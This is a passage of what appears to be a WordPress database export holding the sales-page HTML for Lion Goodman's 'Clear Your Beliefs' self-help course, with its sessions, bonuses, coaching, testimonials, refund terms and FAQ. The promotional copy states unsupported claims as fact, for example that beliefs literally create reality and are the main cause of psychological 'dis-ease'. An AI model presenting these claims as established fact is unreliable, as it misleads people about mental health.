src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1866, 2157, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:71178:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you 